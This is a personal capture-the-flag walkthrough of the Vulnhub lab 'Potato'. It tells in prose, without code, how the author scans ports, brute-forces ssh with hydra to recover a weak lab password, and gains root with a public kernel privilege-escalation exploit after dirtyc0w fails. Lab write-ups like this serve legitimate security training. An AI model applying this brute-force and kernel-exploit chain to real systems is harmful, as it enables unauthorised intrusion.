Today we are working on Potato from Vulnhub.com. This box is rated Easy to Medium. After getting the VM downloaded and set up in VMWare we start with our nmap scans.
We have available http and tcp/7120, which appears to be an alternate port for ssh. This is a good example of why we do all tcp ports (-p-) in our initial scan. A standard top-1000 scan (without the -p-) would not have found the second port.
If we browse to the site in Firefox, the sum total of what we get is the above image. The info.php page that the http-enum scan detected gives us good info about the box, but no obvious remote exploit vectors.
I’ll tell you now that I Dirbusted this site to death looking for other information. I tried multiple word lists and more than a dozen different file extensions looking for hidden folders or files. I came up completely empty. However, I have done boxes from this creator before and combined with the hint, “If you ever get stuck, try again with the name of the lab” I attempted to brute force the ssh login with hydra using the username “potato” and password list rockyou.txt.
Hydra discovers a password of “letmein” for user potato. Fortunately, the box creator chose a password close to the beginning of rockyou.txt or else this brute force attempt could have taken days to complete. Having us discover creds by brute-forcing ssh isn’t the most educational way to design a box, but hey, we can now login to the box.
Looking back, we have all the info we need to get our root escalation from the login banner, but at the time I just launched into my standard privesc checks. Linpeas.sh immediately flagged kernel version 3.13.0–24-generic as out-of-date, so I got to work researching kernel exploits for privesc.
My first thought was to attempt dirtyc0w, which exploits a race condition to overwrite /etc/passwd/ with a new user that has root priviliges. However, the exploit broke the box and I had to reboot it. This is a great reminder for anyone who has aspirations for pentesting in the real-world that maybe using dynamite to pick a lock is not always the best option.
After rebooting the box, I continued my kernel exploit search on exploit-db.com. The next exploit that looked interesting was this one this one: https://www.exploit-db.com/exploits/37292. We see from the entry in exploit-db that it is a local privesc exploit that fits our version of kernel and OS. I downloaded the exploit to my Kali box and then launched SimpleHTTPServer so I could download it to Potato.
After that, follow the instructions to compile and run the exploit.
And that is it — we have rooted the box! Feeling a bit like a script kiddie, but even easy boxes help to reinforce our pentesting skills and methodologies. Did you find another path to root? Drop me a comment and let me know. Thanks for reading!
